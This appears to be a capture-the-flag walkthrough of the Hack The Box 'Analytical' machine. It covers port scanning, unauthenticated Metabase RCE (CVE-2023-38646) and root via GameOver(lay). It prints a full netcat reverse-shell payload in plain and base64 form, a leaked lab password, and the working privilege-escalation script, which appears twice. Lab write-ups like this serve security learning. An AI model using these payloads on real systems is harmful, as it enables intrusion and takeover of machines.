Target IP: 10.129.229.224
Challenge Description: N/A.
Performing a port scan using the command sudo nmap -sS 10.129.229.224 -p- returns the result shown above. There are two TCP ports open on the target machine: SSH and HTTP on their standards ports.
I performed an aggressive port scan using the command sudo nmap -sV -A 10.129.229.224 -p 22,80 against the two TCP ports and retrieved the result shown above. According to the HTTP scan, the hostname of the target machine is analytical.htb. I will need to insert this hostname inside my /etc/hosts before performing enumeration.
I inserted the hostname analytical.htb inside my /etc/hosts file. Then I decided to perform a subdomain enumeration using the command ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.analytical.htb" -u http://analytical.htb -fs 154 and obtained the subdomain data, as shown above. I will insert this new subdomain with the name data.analytical.htb inside my /etc/hosts file too. Time to begin with enumeration now :)
Port 80: HTTP (analytical.htb)
The webpage above is displayed for this web application on port 80. I performed a directory search but I did not find anything useful. The website seems to be mainly static. However, pressing the Login button redirects me to http://data.analytical.htb.
Port 80: HTTP (data.analytical.htb)
The webpage above is displayed for this web application. The target machine seems to be running Metabase application on this port. It is asking for the email and password, but I have not found any credentials yet. Time to enumerate further.
Reading through the source code of the webpage, I identified an application version v0.46.6 as shown above. Is the target machine running Metabase v0.46.6? Does it have any vulnerabilities? Time to find out.
Searching for Metabase v0.46.6 vulnerabilities on Google, I found the website above. Apparently the application is vulnerable to RCE without the need of authentication. If the target machine is really running this application version then it is vulnerable to RCE. I do not require the credentials either to perform RCE.
I searched for public exploits for this vulnerability and found the Github repository shown above. This vulnerability has the CVE id of CVE-2023-38646. This repository contains the steps on how to use the exploit. I made a copy of the exploit on my machine and renamed it to exp.py. Time to test it now.
To run the exploit, I opened two terminals as shown above. The top terminal is where I execute the exploit. The bottom terminal is where I have a listener on my machine at port 8443 to catch the reverse shell connection. Firstly, I started a listener on my machine at port 8443. Then I encoded the following payload rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.139 8443 >/tmp/f into base64 and received the output cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL2Jhc2ggLWkgMj4mMXxuYyAxMC4xMC4xNC4xMzkgODQ0MyA+L3RtcC9m. To run the exploit, I used the command python3 exp.py -x cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL2Jhc2ggLWkgMj4mMXxuYyAxMC4xMC4xNC4xMzkgODQ0MyA+L3RtcC9m http://data.analytical.htb. Then I instantly obtained a reverse shell connection with the session as metabase, as shown above.
I executed the command printenv and obtained the result shown above. The password An4lytics_ds20223# of the user metalytics is stored inside the variable META_PASS. I landed in a docker environment, as I have very little control over the target machine in this session. Maybe now I can access the web application using this new credentials?
Using the same credentials, I managed to login into the web application. There is an unusual name called Johnny. Is this user an administrator on the web application?
After some manual enumeration on the web application, I notice the user is an admin as shown above. I tried to find other attack vectors that would give me a higher privilege session reverse shell connection, but I had no luck. I tried to find consoles to perform command execution, webpages to upload a webshell, etc, but I had no luck. SSH is open on port 22. Maybe I can try to SSH into the target machine with the username metalytics@analytical.htb and the password An4lytics_ds20223#?
And it worked. Now I have an SSH session as the user metalytics on the target machine. I successfully elevated my privileges horizontally.
The target machine is running the kernel version 6.2.0-25-generic and Ubuntu 22.04.3 LTS as the OS. From previous knowledge, I know this kernel version is vulnerable to GameOver(lay) Ubuntu Privilege Escalation.
I found the Github repository shown above for this vulnerability. Then I made a copy of the script inside this repository on the target machine for privilege escalation.
At /tmp directory, I made a copy of the script with the name exp.sh. Then I changed the permission of the script to be executable. I then executed the script and obtained a root shell, as shown above. Now I have root access on the target machine :) The content of the script is shown below:
#!/bin/bash
# CVE-2023-2640 CVE-2023-3262: GameOver(lay) Ubuntu Privilege Escalation
# by g1vi https://github.com/g1vi
# October 2023
echo "[+] You should be root now"
echo "[+] Type 'exit' to finish and leave the house cleaned"
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash")'#!/bin/bash
# CVE-2023-2640 CVE-2023-3262: GameOver(lay) Ubuntu Privilege Escalation
# by g1vi https://github.com/g1vi
# October 2023
echo "[+] You should be root now"
echo "[+] Type 'exit' to finish and leave the house cleaned"
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash")'
The two flags are shown above.